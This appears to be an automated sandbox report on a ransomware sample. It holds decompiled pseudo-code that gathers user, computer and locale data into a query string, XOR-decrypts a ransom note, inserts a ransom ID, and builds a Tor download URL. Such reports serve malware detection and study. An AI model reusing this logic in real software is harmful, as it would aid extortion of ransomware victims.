					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0fe670a4
0x0fe670a7
0x0fe670b8
0x0fe670c1
0x0fe670c9
0x0fe670d2
0x0fe670da
0x0fe670da
0x0fe670df
0x0fe670e5
0x0fe670ed
0x0fe670f3
0x0fe670fb
0x0fe670fb
0x0fe67101
0x0fe67107
0x0fe6710f
0x0fe67115
0x0fe6711d
0x0fe6711d
0x0fe67123
0x0fe67129
0x0fe67131
0x0fe67137
0x0fe6713f
0x0fe6713f
0x0fe67145
0x0fe6714b
0x0fe67153
0x0fe67159
0x0fe67161
0x0fe67161
0x0fe67167
0x0fe6716d
0x0fe67175
0x0fe6717b
0x0fe67183
0x0fe67183
0x0fe67189
0x0fe6718f
0x0fe67197
0x0fe6719d
0x0fe671a5
0x0fe671a5
0x0fe671ab
0x0fe671b1
0x0fe671b9
0x0fe671bf
0x0fe671c7
0x0fe671c7
0x0fe671cd
0x0fe671d3
0x0fe671db
0x0fe671e1
0x0fe671e9
0x0fe671e9
0x0fe671ef
0x0fe671fc
0x0fe67202
0x0fe67205
0x0fe6720a
0x0fe67227
0x0fe6720c
0x0fe67216
0x0fe6721c
0x0fe67234
0x0fe6723c
0x0fe67242
0x0fe6724a
0x0fe67256
0x0fe67256
0x0fe67260
0x0fe67266
0x0fe6726e
0x0fe67274
0x0fe6727c
0x0fe6727c
0x0fe67288
0x0fe67292

APIs

lstrcatW.KERNEL32(?,?), ref: 0FE670C1
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE670C9
lstrcatW.KERNEL32(?,?), ref: 0FE670D2
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE670DA
lstrcatW.KERNEL32(?,?), ref: 0FE670E5
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE670ED
lstrcatW.KERNEL32(?,?), ref: 0FE670F3
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE670FB
lstrcatW.KERNEL32(?,?), ref: 0FE67107
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE6710F
lstrcatW.KERNEL32(?,?), ref: 0FE67115
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6711D
lstrcatW.KERNEL32(?,?), ref: 0FE67129
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67131
lstrcatW.KERNEL32(?,?), ref: 0FE67137
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6713F
lstrcatW.KERNEL32(?,?), ref: 0FE6714B
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67153
lstrcatW.KERNEL32(?,?), ref: 0FE67159
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE67161
lstrcatW.KERNEL32(?,?), ref: 0FE6716D
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67175
lstrcatW.KERNEL32(?,?), ref: 0FE6717B
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE67183
lstrcatW.KERNEL32(?,0FE64B36), ref: 0FE6718F
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67197
lstrcatW.KERNEL32(?,?), ref: 0FE6719D
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE671A5
lstrcatW.KERNEL32(?,?), ref: 0FE671B1
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE671B9
lstrcatW.KERNEL32(?,?), ref: 0FE671BF
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE671C7
lstrcatW.KERNEL32(?,?), ref: 0FE671D3
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE671DB
lstrcatW.KERNEL32(?,?), ref: 0FE671E1
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE671E9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FE64869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FE671FC
wsprintfW.USER32 ref: 0FE67216
wsprintfW.USER32 ref: 0FE67227
lstrcatW.KERNEL32(?,?), ref: 0FE67234
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE6723C
lstrcatW.KERNEL32(?,?), ref: 0FE67242
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE67256
lstrcatW.KERNEL32(?,?), ref: 0FE67266
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE6726E
lstrcatW.KERNEL32(?,?), ref: 0FE67274
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FE64869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6727F

Strings

%x%x, xrefs: 0FE67210
undefined, xrefs: 0FE67221

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: deeebbe01f2aee4eda1b3fe341d53ed679c5c91f5ef888f97d948bdc77b470c4
Instruction ID: 0f957a7c9a228ca68e6d611144b994fcf7c8df19471639a7f6ce6b0f87d69e9c
Opcode Fuzzy Hash: deeebbe01f2aee4eda1b3fe341d53ed679c5c91f5ef888f97d948bdc77b470c4
Instruction Fuzzy Hash: 32514F3118669CB6CB233F619C49FDF3B19EFC6788F022161F9101405B9BA99252DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FE642B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0FE642B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfe72a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FE63BC0( &_v148);
				E0FE67490( &_v236, __edx); // executed
				_t97 = E0FE672A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FE670A0( &_v152, _t98); // executed
				_t60 = E0FE681F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfe70510]");
				_t77 = 0xfe72000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfe72000) =  *(_t62 + 0xfe72000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfe72a64 = 0xfe72000;
				_t94 = E0FE681F0(0xfe72000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfe72a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xfe72a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0FE67D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfe72000;
					_t69 =  *0xfe72000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfe72000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0fe642c5
0x0fe64598
0x0fe6459d
0x0fe6459d
0x0fe642cb
0x0fe642cc
0x0fe642ce
0x0fe642cf
0x0fe642d4
0x0fe642d6
0x0fe642d7
0x0fe642d9
0x0fe642da
0x0fe642dc
0x0fe642dd
0x0fe642df
0x0fe642e0
0x0fe642e5
0x0fe642e7
0x0fe642e8
0x0fe642f1
0x0fe642fd
0x0fe6430e
0x0fe64317
0x0fe64321
0x0fe64327
0x0fe64330
0x0fe64341
0x0fe6433d
0x0fe6433d
0x0fe6433d
0x0fe6434b
0x0fe64357
0x0fe64363
0x0fe64369
0x0fe64371
0x0fe64376
0x0fe6437b
0x0fe6437e
0x0fe64383
0x0fe64390
0x0fe64390
0x0fe64390
0x0fe64393
0x0fe64398
0x0fe6439c
0x0fe643a1
0x0fe643a1
0x0fe643b0
0x0fe643b0
0x0fe643b7
0x0fe643b8
0x0fe643c4
0x0fe643d8
0x0fe643dc
0x0fe64456
0x0fe6445d
0x0fe64465
0x0fe6446d
0x0fe64475
0x0fe6447d
0x0fe64485
0x0fe6448d
0x0fe64495
0x0fe6449d
0x0fe644a5
0x0fe644ad
0x0fe644b5
0x0fe644bd
0x0fe644c5
0x0fe644cd
0x0fe644d5
0x0fe644dd
0x0fe644e5
0x0fe644ed
0x0fe644f5
0x0fe644fd
0x0fe64505
0x0fe6450d
0x0fe64515
0x0fe6451d
0x0fe64525
0x0fe6452d
0x0fe64535
0x0fe6453d
0x0fe64545
0x0fe64555
0x0fe6455b
0x0fe64562
0x0fe6456f
0x0fe64575
0x0fe64562
0x0fe64586
0x0fe64593
0x00000000
0x0fe64593
0x0fe643e0
0x0fe643e0
0x0fe643e2
0x0fe643f4
0x0fe643f8
0x0fe643fd
0x0fe64406
0x00000000
0x00000000
0x0fe6440a
0x0fe6440d
0x0fe64413
0x0fe64413
0x0fe6441b
0x00000000
0x00000000
0x0fe64420
0x0fe64420
0x0fe64426
0x00000000
0x00000000
0x0fe64430
0x0fe64432
0x0fe6443d
0x0fe64441
0x00000000
0x00000000
0x00000000
0x0fe64441
0x0fe64434
0x0fe6443b
0x00000000
0x00000000
0x00000000
0x0fe6443b
0x0fe6459e
0x00000000
0x0fe64447
0x0fe64447
0x0fe64447
0x0fe6444b
0x0fe6444e
0x0fe64451
0x00000000
0x0fe64413
0x00000000

APIs

Part of subcall function 0FE63BC0: GetProcessHeap.KERNEL32(?,?,0FE64807,00000000,?,00000000,00000000), ref: 0FE63C5C

Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FE674B7
Part of subcall function 0FE67490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FE674E6
Part of subcall function 0FE67490: GetComputerNameW.KERNEL32 ref: 0FE674F0
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE67510
Part of subcall function 0FE67490: wsprintfW.USER32 ref: 0FE67551
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE6756E
Part of subcall function 0FE67490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
Part of subcall function 0FE67490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
Part of subcall function 0FE67490: RegCloseKey.KERNEL32(00000000), ref: 0FE675D2

Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64363
lstrcpyW.KERNEL32 ref: 0FE643E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE643E9

Strings

d, xrefs: 0FE644ED
c, xrefs: 0FE644AD
-, xrefs: 0FE6450D
h, xrefs: 0FE6445D
h, xrefs: 0FE64525
w, xrefs: 0FE644F5
m, xrefs: 0FE6452D
a, xrefs: 0FE64505
{USERID}, xrefs: 0FE643BF, 0FE6440D, 0FE64413
n, xrefs: 0FE6453D
w, xrefs: 0FE64485
d, xrefs: 0FE644E5
., xrefs: 0FE644B5
/, xrefs: 0FE64475
t, xrefs: 0FE6448D
j, xrefs: 0FE644A5
r, xrefs: 0FE64495
r, xrefs: 0FE6449D
ransom_id=, xrefs: 0FE64350, 0FE6435C
w, xrefs: 0FE6447D
r, xrefs: 0FE644BD
a, xrefs: 0FE64515
n, xrefs: 0FE644D5
t, xrefs: 0FE64465
., xrefs: 0FE64535
/, xrefs: 0FE644C5
s, xrefs: 0FE6446D
l, xrefs: 0FE644FD
y, xrefs: 0FE6451D
o, xrefs: 0FE644CD
o, xrefs: 0FE644DD

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 5561eaae9d1c95150cd9a4bd799220c340d808f6291a474518b638249ce5a119
Instruction ID: add3adfdddc489a323de47aed9a2c2fd5d2ed76a0db0aba1f561f90805c6ec8e
Opcode Fuzzy Hash: 5561eaae9d1c95150cd9a4bd799220c340d808f6291a474518b638249ce5a119
Instruction Fuzzy Hash: 107125B05843448BE730DF10D80977B7BE2FB81788F50591CF6855B2D2EBB99948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0FE643A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE643A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfe72000) =  *(_t41 + 0xfe72000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfe72a64 = 0xfe72000;
				_t60 = E0FE681F0(0xfe72000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfe72000;
						_t49 =  *0xfe72000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfe72000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfe72a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xfe72a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0FE67D70( &_a136);
				return _t44;
			}

0x0fe643a6
0x0fe643b0
0x0fe643b0
0x0fe643b7
0x0fe643b8
0x0fe643c4
0x0fe643d8
0x0fe643dc
0x0fe643e0
0x0fe643e0
0x0fe643e2
0x0fe643f4
0x0fe643f8
0x0fe643fd
0x0fe64406
0x00000000
0x00000000
0x0fe6440a
0x0fe6440d
0x0fe64413
0x0fe64413
0x0fe6441b
0x00000000
0x0fe64420
0x0fe64420
0x0fe64420
0x0fe64426
0x00000000
0x00000000
0x0fe64430
0x0fe64432
0x0fe6443d
0x0fe64441
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe64434
0x0fe64434
0x0fe6443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe6443b
0x00000000
0x0fe64432
0x0fe6459e
0x00000000
0x0fe6459e
0x00000000
0x0fe64447
0x0fe64447
0x0fe64447
0x0fe6444b
0x0fe6444e
0x0fe64451
0x00000000
0x0fe64413
0x0fe643e0
0x0fe64456
0x0fe6445d
0x0fe64465
0x0fe6446d
0x0fe64475
0x0fe6447d
0x0fe64485
0x0fe6448d
0x0fe64495
0x0fe6449d
0x0fe644a5
0x0fe644ad
0x0fe644b5
0x0fe644bd
0x0fe644c5
0x0fe644cd
0x0fe644d5
0x0fe644dd
0x0fe644e5
0x0fe644ed
0x0fe644f5
0x0fe644fd
0x0fe64505
0x0fe6450d
0x0fe64515
0x0fe6451d
0x0fe64525
0x0fe6452d
0x0fe64535
0x0fe6453d
0x0fe64545
0x0fe64555
0x0fe6455b
0x0fe64562
0x0fe6456f
0x0fe64575
0x0fe64562
0x0fe64586
0x0fe64593
0x0fe6459d

APIs

lstrcpyW.KERNEL32 ref: 0FE643E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE643E9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FE64555
wsprintfW.USER32 ref: 0FE6456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0FE64586

Strings

d, xrefs: 0FE644ED
c, xrefs: 0FE644AD
-, xrefs: 0FE6450D
h, xrefs: 0FE6445D
h, xrefs: 0FE64525
w, xrefs: 0FE644F5
m, xrefs: 0FE6452D
a, xrefs: 0FE64505
{USERID}, xrefs: 0FE643BF, 0FE6440D, 0FE64413
n, xrefs: 0FE6453D
w, xrefs: 0FE64485
d, xrefs: 0FE644E5
., xrefs: 0FE644B5
/, xrefs: 0FE64475
t, xrefs: 0FE6448D
j, xrefs: 0FE644A5
r, xrefs: 0FE64495
r, xrefs: 0FE6449D
w, xrefs: 0FE6447D
r, xrefs: 0FE644BD
a, xrefs: 0FE64515
n, xrefs: 0FE644D5
t, xrefs: 0FE64465
., xrefs: 0FE64535
/, xrefs: 0FE644C5
s, xrefs: 0FE6446D
l, xrefs: 0FE644FD
y, xrefs: 0FE6451D
o, xrefs: 0FE644CD
o, xrefs: 0FE644DD

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: 2205c7c3dedd5134c25251f5f8823b2ed953a7563fe64fb00f8c276cf95cbdee
